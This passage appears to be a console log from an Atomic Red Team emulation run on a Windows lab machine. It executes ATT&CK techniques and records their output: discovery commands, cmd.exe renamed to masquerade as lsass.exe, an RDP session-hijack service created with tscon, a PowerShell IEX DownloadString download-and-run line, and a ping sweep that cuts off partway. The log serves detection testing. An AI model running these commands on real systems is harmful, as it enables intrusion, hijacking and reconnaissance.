2651Id : 1556
2652Handles : 334
2653CPU : 0.40625
2654SI : 2
2655Name : taskhostw
2656
2657
2658Id : 8340
2659Handles : 595
2660CPU : 1.578125
2661SI : 2
2662Name : Taskmgr
2663
2664
2665Id : 5156
2666Handles : 123
2667CPU : 0.015625
2668SI : 0
2669Name : unsecapp
2670
2671
2672Id : 5880
2673Handles : 207
2674CPU : 0.03125
2675SI : 0
2676Name : vds
2677
2678
2679Id : 1408
2680Handles : 156
2681CPU : 0.015625
2682SI : 0
2683Name : VSSVC
2684
2685
2686Id : 1964
2687Handles : 243
2688CPU : 0.140625
2689SI : 0
2690Name : vulnservice
2691
2692
2693Id : 5692
2694Handles : 172
2695CPU : 0.015625
2696SI : 0
2697Name : wbengine
2698
2699
2700Id : 7284
2701Handles : 102
2702CPU : 0.015625
2703SI : 0
2704Name : Windows.WARP.JITService
2705
2706
2707Id : 660
2708Handles : 155
2709CPU : 0.0625
2710SI : 0
2711Name : wininit
2712
2713
2714Id : 3376
2715Handles : 300
2716CPU : 20.984375
2717SI : 0
2718Name : winlogbeat
2719
2720
2721Id : 764
2722Handles : 197
2723CPU : 0.0625
2724SI : 1
2725Name : winlogon
2726
2727
2728Id : 5420
2729Handles : 246
2730CPU : 0.15625
2731SI : 2
2732Name : winlogon
2733
2734
2735Id : 4512
2736Handles : 459
2737CPU : 3
2738SI : 0
2739Name : WmiPrvSE
2740
2741
2742Id : 4796
2743Handles : 165
2744CPU : 0.09375
2745SI : 0
2746Name : WmiPrvSE
2747
2748[!!!!!!!!END TEST!!!!!!!]
2749
2750
2751Executing T1016 technique
2752Attempting to run Atomic Techniques
2753Tarcking UUID is T1016_atomictest
2754Attempting to convert files from yaml
2755path: C:\AtomicRedTeam\atomics\T1016\T1016.yaml
2756file: C:\AtomicRedTeam\atomics\T1016\T1016.yaml
2757Converting C:\AtomicRedTeam\atomics\T1016\T1016.yaml from Yaml
2758Determining tests for Windows
2759Determining manual tests
2760[********BEGIN TEST*******]
2761System Network Configuration Discovery T1016
2762System Network Configuration Discovery
2763Identify network configuration information
2764
2765Invoking Atomic Tests using defined executor
2766Performing the operation "Execute Atomic Test" on target "System Network Configuration Discovery".
2767Command Prompt:
2768 ipconfig /all
2769netsh interface show
2770arp -a
2771nbtstat -n
2772net config
2773
2774Command Prompt:
2775 ipconfig /all
2776netsh interface show
2777arp -a
2778nbtstat -n
2779net config
2780
2781
2782Windows IP Configuration
2783
2784 Host Name . . . . . . . . . . . . : it001
2785 Primary Dns Suffix . . . . . . . : shire.com
2786 Node Type . . . . . . . . . . . . : Hybrid
2787 IP Routing Enabled. . . . . . . . : No
2788 WINS Proxy Enabled. . . . . . . . : No
2789 DNS Suffix Search List. . . . . . : us-west-1.ec2-utilities.amazonaws.com
2790 us-west-1.compute.internal
2791 shire.com
2792
2793Ethernet adapter Ethernet:
2794
2795 Connection-specific DNS Suffix . : shire.com
2796 Description . . . . . . . . . . . : AWS PV Network Device #0
2797 Physical Address. . . . . . . . . : 06-F4-A0-B7-47-75
2798 DHCP Enabled. . . . . . . . . . . : Yes
2799 Autoconfiguration Enabled . . . . : Yes
2800 Link-local IPv6 Address . . . . . : fe80::a865:dc38:f51b:6f98%9(Preferred)
2801 IPv4 Address. . . . . . . . . . . : 172.18.39.105(Preferred)
2802 Subnet Mask . . . . . . . . . . . : 255.255.255.0
2803 Lease Obtained. . . . . . . . . . : Tuesday, September 3, 2019 3:08:28 AM
2804 Lease Expires . . . . . . . . . . : Tuesday, September 3, 2019 4:38:28 AM
2805 Default Gateway . . . . . . . . . : 172.18.39.1
2806 DHCP Server . . . . . . . . . . . : 172.18.39.1
2807 DHCPv6 IAID . . . . . . . . . . . : 151449454
2808 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-B0-82-1D-00-0C-29-B8-10-D9
2809 DNS Servers . . . . . . . . . . . : 172.18.39.5
2810 8.8.8.8
2811 Primary WINS Server . . . . . . . : 172.18.39.5
2812 NetBIOS over Tcpip. . . . . . . . : Enabled
2813
2814The following commands are available:
2815
2816Commands in this context:
2817show interface - Displays interfaces.
2818
2819Interface: 172.18.39.105 --- 0x9
2820 Internet Address Physical Address Type
2821 169.254.169.254 06-58-be-8e-50-97 dynamic
2822 172.18.39.1 06-58-be-8e-50-97 dynamic
2823 172.18.39.5 06-58-a0-24-7b-41 dynamic
2824 172.18.39.102 06-95-f4-36-cf-05 dynamic
2825 172.18.39.137 06-82-00-3e-1a-ed dynamic
2826 172.18.39.255 ff-ff-ff-ff-ff-ff static
2827 224.0.0.22 01-00-5e-00-00-16 static
2828 224.0.0.252 01-00-5e-00-00-fc static
2829 239.255.255.250 01-00-5e-7f-ff-fa static
2830 255.255.255.255 ff-ff-ff-ff-ff-ff static
2831
2832Ethernet:
2833Node IpAddress: [172.18.39.105] Scope Id: []
2834
2835 NetBIOS Local Name Table
2836
2837 Name Type Status
2838 ---------------------------------------------
2839 IT001 <00> UNIQUE Registered
2840 SHIRE <00> GROUP Registered
2841 IT001 <20> UNIQUE Registered
2842The following running services can be controlled:
2843
2844 Server
2845 Workstation
2846
2847The command completed successfully.
2848
2849Determining tests for Windows
2850Unable to run non-Windows tests
2851[!!!!!!!!END TEST!!!!!!!]
2852
2853
2854Executing T1083 technique
2855Attempting to run Atomic Techniques
2856Tarcking UUID is T1083_atomictest
2857Attempting to convert files from yaml
2858path: C:\AtomicRedTeam\atomics\T1083\T1083.yaml
2859file: C:\AtomicRedTeam\atomics\T1083\T1083.yaml
2860Converting C:\AtomicRedTeam\atomics\T1083\T1083.yaml from Yaml
2861Determining tests for Windows
2862Determining manual tests
2863[********BEGIN TEST*******]
2864File and Directory Discovery T1083
2865File and Directory Discovery
2866Find or discover files on the file system
2867
2868Invoking Atomic Tests using defined executor
2869Performing the operation "Execute Atomic Test" on target "File and Directory Discovery".
2870Command Prompt:
2871 dir /s c:\ >> %temp%\download
2872dir /s "c:\Documents and Settings" >> %temp%\download
2873dir /s "c:\Program Files\" >> %temp%\download
2874dir /s d:\ >> %temp%\download
2875dir "%systemdrive%\Users\*.*" >> %temp%\download
2876dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
2877dir "%userprofile%\Desktop\*.*" >> %temp%\download
2878tree /F >> %temp%\download
2879
2880Command Prompt:
2881 dir /s c:\ >> %temp%\download
2882dir /s "c:\Documents and Settings" >> %temp%\download
2883dir /s "c:\Program Files\" >> %temp%\download
2884dir /s d:\ >> %temp%\download
2885dir "%systemdrive%\Users\*.*" >> %temp%\download
2886dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
2887dir "%userprofile%\Desktop\*.*" >> %temp%\download
2888tree /F >> %temp%\download
2889
2890cmd.exe : The filename, directory name, or volume label syntax is incorrect.
2891At line:1 char:1
2892+ cmd.exe /c "dir /s "c:\Documents and Settings" >> %temp%\download"
2893+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2894 + CategoryInfo : NotSpecified: (The filename, d...x is incorrect.:String) [], RemoteException
2895 + FullyQualifiedErrorId : NativeCommandError
2896
2897cmd.exe : The filename, directory name, or volume label syntax is incorrect.
2898At line:1 char:1
2899+ cmd.exe /c "dir /s "c:\Program Files\" >> %temp%\download"
2900+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2901 + CategoryInfo : NotSpecified: (The filename, d...x is incorrect.:String) [], RemoteException
2902 + FullyQualifiedErrorId : NativeCommandError
2903
2904cmd.exe : The system cannot find the path specified.
2905At line:1 char:1
2906+ cmd.exe /c "dir /s d:\ >> %temp%\download"
2907+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2908 + CategoryInfo : NotSpecified: (The system cann...path specified.:String) [], RemoteException
2909 + FullyQualifiedErrorId : NativeCommandError
2910
2911cmd.exe : The filename, directory name, or volume label syntax is incorrect.
2912At line:1 char:1
2913+ cmd.exe /c "dir "%systemdrive%\Users\*.*" >> %temp%\download"
2914+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2915 + CategoryInfo : NotSpecified: (The filename, d...x is incorrect.:String) [], RemoteException
2916 + FullyQualifiedErrorId : NativeCommandError
2917
2918cmd.exe : The filename, directory name, or volume label syntax is incorrect.
2919At line:1 char:1
2920+ cmd.exe /c "dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Rece ...
2921+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2922 + CategoryInfo : NotSpecified: (The filename, d...x is incorrect.:String) [], RemoteException
2923 + FullyQualifiedErrorId : NativeCommandError
2924
2925cmd.exe : The filename, directory name, or volume label syntax is incorrect.
2926At line:1 char:1
2927+ cmd.exe /c "dir "%userprofile%\Desktop\*.*" >> %temp%\download"
2928+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2929 + CategoryInfo : NotSpecified: (The filename, d...x is incorrect.:String) [], RemoteException
2930 + FullyQualifiedErrorId : NativeCommandError
2931
2932Determining tests for Windows
2933Determining manual tests
2934[********BEGIN TEST*******]
2935File and Directory Discovery T1083
2936File and Directory Discovery
2937Find or discover files on the file system
2938
2939Invoking Atomic Tests using defined executor
2940Performing the operation "Execute Atomic Test" on target "File and Directory Discovery".
2941PowerShell:
2942 ls -recurse
2943get-childitem -recurse
2944gci -recurse
2945
2946PowerShell
2947 ls -recurse
2948get-childitem -recurse
2949gci -recurse
2950
2951
2952LastWriteTime : 9/3/2019 3:46:43 AM
2953Length : 1078
2954Name : Atomic-license.txt
2955
2956
2957LastWriteTime : 9/3/2019 3:46:43 AM
2958Length : 1078
2959Name : Atomic-license.txt
2960
2961
2962LastWriteTime : 9/3/2019 3:46:43 AM
2963Length : 1078
2964Name : Atomic-license.txt
2965
2966Determining tests for Windows
2967Unable to run non-Windows tests
2968Determining tests for Windows
2969Unable to run non-Windows tests
2970[!!!!!!!!END TEST!!!!!!!]
2971
2972
2973Executing T1082 technique
2974Attempting to run Atomic Techniques
2975Tarcking UUID is T1082_atomictest
2976Attempting to convert files from yaml
2977path: C:\AtomicRedTeam\atomics\T1082\T1082.yaml
2978file: C:\AtomicRedTeam\atomics\T1082\T1082.yaml
2979Converting C:\AtomicRedTeam\atomics\T1082\T1082.yaml from Yaml
2980Determining tests for Windows
2981Determining manual tests
2982[********BEGIN TEST*******]
2983System Information Discovery T1082
2984System Information Discovery
2985Identify System Info
2986
2987Invoking Atomic Tests using defined executor
2988Performing the operation "Execute Atomic Test" on target "System Information Discovery".
2989Command Prompt:
2990 systeminfo
2991reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
2992
2993Command Prompt:
2994 systeminfo
2995reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
2996
2997
2998Host Name: IT001
2999OS Name: Microsoft Windows 10 Pro
3000OS Version: 10.0.17134 N/A Build 17134
3001OS Manufacturer: Microsoft Corporation
3002OS Configuration: Member Workstation
3003OS Build Type: Multiprocessor Free
3004Registered Owner: User
3005Registered Organization:
3006Product ID: 00330-80000-00000-AA310
3007Original Install Date: 7/4/2019, 8:53:50 PM
3008System Boot Time: 9/3/2019, 3:08:16 AM
3009System Manufacturer: Xen
3010System Model: HVM domU
3011System Type: x64-based PC
3012Processor(s): 1 Processor(s) Installed.
3013 [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
3014BIOS Version: Xen 4.2.amazon, 8/24/2006
3015Windows Directory: C:\Windows
3016System Directory: C:\Windows\system32
3017Boot Device: \Device\HarddiskVolume1
3018System Locale: en-us;English (United States)
3019Input Locale: en-us;English (United States)
3020Time Zone: (UTC-08:00) Pacific Time (US & Canada)
3021Total Physical Memory: 4,096 MB
3022Available Physical Memory: 1,752 MB
3023Virtual Memory: Max Size: 5,504 MB
3024Virtual Memory: Available: 3,233 MB
3025Virtual Memory: In Use: 2,271 MB
3026Page File Location(s): C:\pagefile.sys
3027Domain: shire.com
3028Logon Server: \\HFDC1
3029Hotfix(s): 6 Hotfix(s) Installed.
3030 [01]: KB4230204
3031 [02]: KB4343669
3032 [03]: KB4343902
3033 [04]: KB4503308
3034 [05]: KB4509094
3035 [06]: KB4507435
3036Network Card(s): 1 NIC(s) Installed.
3037 [01]: AWS PV Network Device
3038 Connection Name: Ethernet
3039 DHCP Enabled: Yes
3040 DHCP Server: 172.18.39.1
3041 IP address(es)
3042 [01]: 172.18.39.105
3043 [02]: fe80::a865:dc38:f51b:6f98
3044Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
3045
3046HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Disk\Enum
3047 0 REG_SZ SCSI\Disk&Ven_AWS&Prod_PVDISK\000000
3048 Count REG_DWORD 0x1
3049 NextInstance REG_DWORD 0x1
3050
3051Determining tests for Windows
3052Unable to run non-Windows tests
3053Determining tests for Windows
3054Unable to run non-Windows tests
3055Determining tests for Windows
3056Unable to run non-Windows tests
3057Determining tests for Windows
3058Unable to run non-Windows tests
3059[!!!!!!!!END TEST!!!!!!!]
3060
3061
3062Executing T1036 technique
3063Attempting to run Atomic Techniques
3064Tarcking UUID is T1036_atomictest
3065Attempting to convert files from yaml
3066path: C:\AtomicRedTeam\atomics\T1036\T1036.yaml
3067file: C:\AtomicRedTeam\atomics\T1036\T1036.yaml
3068Converting C:\AtomicRedTeam\atomics\T1036\T1036.yaml from Yaml
3069Determining tests for Windows
3070Determining manual tests
3071[********BEGIN TEST*******]
3072Masquerading T1036
3073Masquerading as Windows LSASS process
3074Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
3075
3076Invoking Atomic Tests using defined executor
3077Performing the operation "Execute Atomic Test" on target "Masquerading as Windows LSASS process".
3078Command Prompt:
3079 cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
3080start cmd.exe /c %SystemRoot%\Temp\lsass.exe
3081
3082Command Prompt:
3083 cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
3084start cmd.exe /c %SystemRoot%\Temp\lsass.exe
3085
3086 1 file(s) copied.
3087Determining tests for Windows
3088Unable to run non-Windows tests
3089[!!!!!!!!END TEST!!!!!!!]
3090
3091
3092Executing T1076 technique
3093Attempting to run Atomic Techniques
3094Tarcking UUID is T1076_atomictest
3095Attempting to convert files from yaml
3096path: C:\AtomicRedTeam\atomics\T1076\T1076.yaml
3097file: C:\AtomicRedTeam\atomics\T1076\T1076.yaml
3098Converting C:\AtomicRedTeam\atomics\T1076\T1076.yaml from Yaml
3099Determining tests for Windows
3100Determining manual tests
3101[********BEGIN TEST*******]
3102Remote Desktop Protocol T1076
3103RDP
3104RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently
3105-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an
3106organization
3107
3108Invoking Atomic Tests using defined executor
3109Performing the operation "Execute Atomic Test" on target "RDP".
3110Command Prompt:
3111 query user
3112sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
3113net start sesshijack
3114sc.exe delete sesshijack
3115
3116Command Prompt:
3117 query user
3118sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
3119net start sesshijack
3120sc.exe delete sesshijack
3121
3122 USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
3123>pgustavo rdp-tcp#0 2 Active . 9/3/2019 3:25 AM
3124DESCRIPTION:
3125 Creates a service entry in the registry and Service Database.
3126USAGE:
3127 sc <server> create [service name] [binPath= ] <option1> <option2>...
3128
3129OPTIONS:
3130NOTE: The option name includes the equal sign.
3131 A space is required between the equal sign and the value.
3132 type= <own|share|interact|kernel|filesys|rec|userown|usershare>
3133 (default = own)
3134 start= <boot|system|auto|demand|disabled|delayed-auto>
3135 (default = demand)
3136 error= <normal|severe|critical|ignore>
3137 (default = normal)
3138 binPath= <BinaryPathName to the .exe file>
3139 group= <LoadOrderGroup>
3140 tag= <yes|no>
3141 depend= <Dependencies(separated by / (forward slash))>
3142 obj= <AccountName|ObjectName>
3143 (default = LocalSystem)
3144 DisplayName= <display name>
3145 password= <password>
3146cmd.exe : The service name is invalid.
3147At line:1 char:1
3148+ cmd.exe /c "net start sesshijack"
3149+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3150 + CategoryInfo : NotSpecified: (The service name is invalid.:String) [], RemoteException
3151 + FullyQualifiedErrorId : NativeCommandError
3152
3153
3154More help is available by typing NET HELPMSG 2185.
3155
3156
3157[SC] OpenService FAILED 1060:
3158
3159The specified service does not exist as an installed service.
3160
3161[!!!!!!!!END TEST!!!!!!!]
3162
3163
3164Executing T1074 technique
3165Attempting to run Atomic Techniques
3166Tarcking UUID is T1074_atomictest
3167Attempting to convert files from yaml
3168path: C:\AtomicRedTeam\atomics\T1074\T1074.yaml
3169file: C:\AtomicRedTeam\atomics\T1074\T1074.yaml
3170Converting C:\AtomicRedTeam\atomics\T1074\T1074.yaml from Yaml
3171Determining tests for Windows
3172Determining manual tests
3173[********BEGIN TEST*******]
3174Data Staged T1074
3175Stage data from Discovery.bat
3176Utilize powershell to download discovery.bat and save to a local file
3177
3178Invoking Atomic Tests using defined executor
3179Performing the operation "Execute Atomic Test" on target "Stage data from Discovery.bat".
3180PowerShell:
3181 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/A
3182RTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
3183
3184PowerShell
3185 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/A
3186RTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
3187
3188Determining tests for Windows
3189Unable to run non-Windows tests
3190[!!!!!!!!END TEST!!!!!!!]
3191
3192
3193Executing T1033 technique
3194Attempting to run Atomic Techniques
3195Tarcking UUID is T1033_atomictest
3196Attempting to convert files from yaml
3197path: C:\AtomicRedTeam\atomics\T1033\T1033.yaml
3198file: C:\AtomicRedTeam\atomics\T1033\T1033.yaml
3199Converting C:\AtomicRedTeam\atomics\T1033\T1033.yaml from Yaml
3200Determining tests for Windows
3201Determining manual tests
3202[********BEGIN TEST*******]
3203System Owner/User Discovery T1033
3204System Owner/User Discovery
3205Identify System owner or users on an endpoint
3206
3207Replacing inputArgs with default values
3208Invoking Atomic Tests using defined executor
3209Performing the operation "Execute Atomic Test" on target "System Owner/User Discovery".
3210Command Prompt:
3211 cmd.exe /C whoami
3212wmic useraccount get /ALL
3213quser
3214qwinsta.exe
3215
3216Command Prompt:
3217 cmd.exe /C whoami
3218wmic useraccount get /ALL
3219quser
3220qwinsta.exe
3221
3222shire\pgustavo
3223AccountType Caption Description Disabled Domain FullName InstallDate LocalAccount Lockout Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status
3224
3225512 IT001\Administrator Built-in account for administering the computer/domain TRUE IT001 TRUE FALSE Administrator TRUE FALSE TRUE S-1-5-21-2765686229-3643345068-3530821166-500 1 Degraded
3226
3227512 IT001\Atomic Red FALSE IT001 Atomic TRUE FALSE Atomic TRUE TRUE FALSE S-1-5-21-2765686229-3643345068-3530821166-1002 1 OK
3228
3229512 IT001\DefaultAccount A user account managed by the system. TRUE IT001 TRUE FALSE DefaultAccount TRUE FALSE FALSE S-1-5-21-2765686229-3643345068-3530821166-503 1 Degraded
3230
3231512 IT001\Guest Built-in account for guest access to the computer/domain TRUE IT001 TRUE FALSE Guest FALSE FALSE FALSE S-1-5-21-2765686229-3643345068-3530821166-501 1 Degraded
3232
3233512 IT001\User FALSE IT001 TRUE FALSE User TRUE FALSE FALSE S-1-5-21-2765686229-3643345068-3530821166-1001 1 OK
3234
3235512 IT001\WDAGUtilityAccount A user account managed and used by the system for Windows Defender Application Guard scenarios. TRUE IT001 TRUE FALSE WDAGUtilityAccount TRUE TRUE TRUE S-1-5-21-2765686229-3643345068-3530821166-504 1 Degraded
3236
3237512 SHIRE\Administrator Built-in account for administering the computer/domain FALSE SHIRE FALSE FALSE Administrator TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-500 1 OK
3238
3239512 SHIRE\Guest Built-in account for guest access to the computer/domain TRUE SHIRE FALSE FALSE Guest TRUE FALSE FALSE S-1-5-21-47903322-2936176756-2312637138-501 1 Degraded
3240
3241512 SHIRE\krbtgt Key Distribution Center Service Account TRUE SHIRE FALSE FALSE krbtgt TRUE TRUE TRUE S-1-5-21-47903322-2936176756-2312637138-502 1 Degraded
3242
3243512 SHIRE\DefaultAccount A user account managed by the system. TRUE SHIRE FALSE FALSE DefaultAccount TRUE FALSE FALSE S-1-5-21-47903322-2936176756-2312637138-503 1 Degraded
3244
3245512 SHIRE\pgustavo FALSE SHIRE Pedro Gustavo FALSE FALSE pgustavo TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1103 1 OK
3246
3247512 SHIRE\lrodriguez FALSE SHIRE Lucho Rodriguez FALSE FALSE lrodriguez TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1104 1 OK
3248
3249512 SHIRE\wecserver FALSE SHIRE Wec Server FALSE FALSE wecserver TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1105 1 OK
3250
3251512 SHIRE\nmartha FALSE SHIRE Norah Martha FALSE FALSE nmartha TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1106 1 OK
3252
3253512 SHIRE\gandalf FALSE SHIRE Gandalf TheWhite FALSE FALSE gandalf TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1107 1 OK
3254
3255512 SHIRE\bilbo FALSE SHIRE Bilbo Baggins FALSE FALSE bilbo TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1113 1 OK
3256
3257512 SHIRE\frodo FALSE SHIRE Frodo Baggins FALSE FALSE frodo TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1114 1 OK
3258
3259512 SHIRE\merry FALSE SHIRE Merry Brandybuck FALSE FALSE merry TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1115 1 OK
3260
3261512 SHIRE\pippin FALSE SHIRE Pippin Took FALSE FALSE pippin TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1116 1 OK
3262
3263512 SHIRE\samwise FALSE SHIRE Samwise Gamgee FALSE FALSE samwise TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1117 1 OK
3264
3265512 SHIRE\saruman FALSE SHIRE Saruman FALSE FALSE saruman TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1118 1 OK
3266
3267512 SHIRE\smaug FALSE SHIRE Smaug FALSE FALSE smaug TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1119 1 OK
3268
3269512 SHIRE\aragorn FALSE SHIRE Aragorn Arathorn FALSE FALSE aragorn TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1120 1 OK
3270
3271512 SHIRE\gimili FALSE SHIRE Gimili Gloin FALSE FALSE gimili TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1121 1 OK
3272
3273512 SHIRE\legolas FALSE SHIRE Legolas Greenleaf FALSE FALSE legolas TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1122 1 OK
3274
3275512 SHIRE\boromir FALSE SHIRE Boromir FALSE FALSE boromir TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1123 1 OK
3276
3277512 SHIRE\elrond FALSE SHIRE Elrond FALSE FALSE elrond TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1124 1 OK
3278
3279
3280
3281 USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
3282>pgustavo rdp-tcp#0 2 Active . 9/3/2019 3:25 AM
3283 SESSIONNAME USERNAME ID STATE TYPE DEVICE
3284 services 0 Disc
3285 console 1 Conn
3286>rdp-tcp#0 pgustavo 2 Active
3287 rdp-tcp 65536 Listen
3288Determining tests for Windows
3289Unable to run non-Windows tests
3290[!!!!!!!!END TEST!!!!!!!]
3291
3292
3293Executing T1018 technique
3294Attempting to run Atomic Techniques
3295Tarcking UUID is T1018_atomictest
3296Attempting to convert files from yaml
3297path: C:\AtomicRedTeam\atomics\T1018\T1018.yaml
3298file: C:\AtomicRedTeam\atomics\T1018\T1018.yaml
3299Converting C:\AtomicRedTeam\atomics\T1018\T1018.yaml from Yaml
3300Determining tests for Windows
3301Determining manual tests
3302[********BEGIN TEST*******]
3303Remote System Discovery T1018
3304Remote System Discovery - net
3305Identify remote systems with net.exe
3306
3307Invoking Atomic Tests using defined executor
3308Performing the operation "Execute Atomic Test" on target "Remote System Discovery - net".
3309Command Prompt:
3310 net view /domain
3311net view
3312
3313Command Prompt:
3314 net view /domain
3315net view
3316
3317cmd.exe : System error 6118 has occurred.
3318At line:1 char:1
3319+ cmd.exe /c "net view /domain"
3320+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3321 + CategoryInfo : NotSpecified: (System error 6118 has occurred.:String) [], RemoteException
3322 + FullyQualifiedErrorId : NativeCommandError
3323
3324
3325
3326The list of servers for this workgroup is not currently available
3327
3328
3329
3330cmd.exe : System error 6118 has occurred.
3331At line:1 char:1
3332+ cmd.exe /c "net view"
3333+ ~~~~~~~~~~~~~~~~~~~~~
3334 + CategoryInfo : NotSpecified: (System error 6118 has occurred.:String) [], RemoteException
3335 + FullyQualifiedErrorId : NativeCommandError
3336
3337
3338
3339The list of servers for this workgroup is not currently available
3340
3341
3342
3343Determining tests for Windows
3344Determining manual tests
3345[********BEGIN TEST*******]
3346Remote System Discovery T1018
3347Remote System Discover - ping sweep
3348Identify remote systems via ping sweep
3349
3350Invoking Atomic Tests using defined executor
3351Performing the operation "Execute Atomic Test" on target "Remote System Discover - ping sweep".
3352Command Prompt:
3353 for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
3354
3355Command Prompt:
3356 for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
3357
3358
3359C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.1
3360
3361Pinging 192.168.1.1 with 32 bytes of data:
3362Request timed out.
3363
3364Ping statistics for 192.168.1.1:
3365 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3366
3367C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.2
3368
3369Pinging 192.168.1.2 with 32 bytes of data:
3370Request timed out.
3371
3372Ping statistics for 192.168.1.2:
3373 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3374
3375C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.3
3376
3377Pinging 192.168.1.3 with 32 bytes of data:
3378Request timed out.
3379
3380Ping statistics for 192.168.1.3:
3381 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3382
3383C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.4
3384
3385Pinging 192.168.1.4 with 32 bytes of data:
3386Request timed out.
3387
3388Ping statistics for 192.168.1.4:
3389 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3390
3391C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.5
3392
3393Pinging 192.168.1.5 with 32 bytes of data:
3394Request timed out.
3395
3396Ping statistics for 192.168.1.5:
3397 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3398
3399C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.6
3400
3401Pinging 192.168.1.6 with 32 bytes of data:
3402Request timed out.
3403
3404Ping statistics for 192.168.1.6:
3405 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3406
3407C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.7
3408
3409Pinging 192.168.1.7 with 32 bytes of data:
3410Request timed out.
3411
3412Ping statistics for 192.168.1.7:
3413 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3414
3415C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.8
3416
3417Pinging 192.168.1.8 with 32 bytes of data:
3418Request timed out.
3419
3420Ping statistics for 192.168.1.8:
3421 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3422
3423C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.9
3424
3425Pinging 192.168.1.9 with 32 bytes of data:
3426Request timed out.
3427
3428Ping statistics for 192.168.1.9:
3429 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3430
3431C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.10
3432
3433Pinging 192.168.1.10 with 32 bytes of data:
3434Request timed out.
3435
